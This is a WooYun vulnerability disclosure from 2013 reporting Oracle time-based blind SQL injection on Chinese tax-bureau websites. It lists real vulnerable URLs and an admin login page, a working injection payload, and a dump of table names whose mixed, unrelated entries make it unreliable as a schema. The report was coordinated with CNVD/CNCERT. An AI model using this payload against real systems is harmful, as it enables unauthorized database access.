当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-046017

漏洞标题:国家税务局多处Oracle盲注漏洞(疑似通用)

相关厂商:政府部门

漏洞作者: HackBraid

提交时间:2013-12-15 14:46

修复时间:2014-01-29 14:47

公开时间:2014-01-29 14:47

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-15: 细节已通知厂商并且等待厂商处理中
2013-12-20: 厂商已经确认,细节仅向厂商公开
2013-12-30: 细节向核心白帽子及相关领域专家公开
2014-01-09: 细节向普通白帽子公开
2014-01-19: 细节向实习白帽子公开
2014-01-29: 细节向公众公开

简要描述:

Oracle盲注,感谢@淡漠天空给我的帮助

详细说明:

1.漏洞点:
http://hd.chinatax.gov.cn/guoshui/action/InitLocalTax.do?tag=1110000
http://hd.chinatax.gov.cn/guoshui/action/InitLocalTax.do?tag=1210200
http://202.108.90.171/guoshui/action/InitLocalTax.do?tag=2340000
http://hd.chinatax.gov.cn/guoshui/action/InitLocalTax.do?tag=1150000
http://202.108.90.171/guoshui/action/InitLocalTax.do?tag=2340000
http://www.bjsat.gov.cn/guoshui/action/InitLocalTax.do?tag=1110000
... ...
应该还有很多,就不一一列举了
2.后台地址:http://hd.chinatax.gov.cn/console/login/LoginForm.jsp
严重性不多说,抓紧修复!

漏洞证明:

数据库名A,跑出95个表,就证明到此,没深入了

Place: GET
Parameter: tag
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: tag=1210200' AND 5721=DBMS_PIPE.RECEIVE_MESSAGE(CHR(80)||CHR(89)||CHR(109)||CHR(70),5) AND 'lNKR'='lNKR
---
Database: =A
[95 tables]
+------------------------------+
| "SGA_XPLAN_TPL_V$SQLTEXT_NL" |
| Avion |
| CLIENTE |
| DWE_Tasks |
| D_PR_CUSTAS |
| Defect |
| KARTA |
| KUNDE |
| Kontrolle |
| LT_CUSTOM2 |
| LT_DECISAO |
| LT_PROCEDIMENTO |
| PERMISSION |
| R2IDF |
| RegistryPackage |
| SALES |
| SUPPORT_INCIDENTS |
| S_SESSOES |
| Students |
| Subject |
| UM_ROLE_PERMISSIONS |
| WidgetPrices |
| acctmanager |
| address_book |
| adresse |
| album |
| bbs |
| binn_catalog_fields |
| cdb_activityapplies |
| chat_config |
| chromosomes |
| cpg_config |
| crops |
| cv_countries |
| db_staff |
| dbstaff |
| emailinfo |
| enseignant |
| federationApplicants |
| forum_flag |
| forum_report |
| geraet |
| gestor |
| hilfe |
| imagem |
| institution |
| ipmacassocs |
| isDeleted_table |
| jiveRoster |
| jos_core_acl_aro |
| jos_vm_creditcard |
| jos_vm_currency |
| jos_vm_payment_method |
| math |
| mein_doc |
| mucConversationLog |
| mymps_member_docu |
| mymps_telephone |
| nuke_banner_plans |
| nuke_downloads_editorials |
| nuke_gallery_pictures |
| nuke_links_votedata |
| nuke_users |
| obb_profiles |
| oil_bfsurveypro_34 |
| pagelinks |
| partners |
| passes |
| persons |
| phpbb_vote_results |
| profession1 |
| pw_posts |
| resources |
| rights |
| sb_host_adminActiveDataFeed |
| specialty |
| spt_datatype_info_ext |
| staff_db |
| stories |
| table_user |
| test_users |
| tt_address |
| tx_tcdirectmail_clicklinks |
| tx_tcdirectmail_targets |
| url |
| user_test |
| users_test |
| usrpass |
| vrls_listings |
| vykachka |
| ways |
| webcal_import_data |
| wp_linkcategories |
| zl_article |
| zl_baoming |
+------------------------------+

修复方案:

你们懂!

版权声明:转载请注明来源 HackBraid@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:19

确认时间:2013-12-20 09:23

厂商回复:

CNVD确认并复现所述情况,转由CNCERT上报国家某信息安全协调机构,并将其中一个案例转报北京市信息化主管部门,由其后续协调网站管理单位处置。按多个漏洞进行评分,rank 19

最新状态:

暂无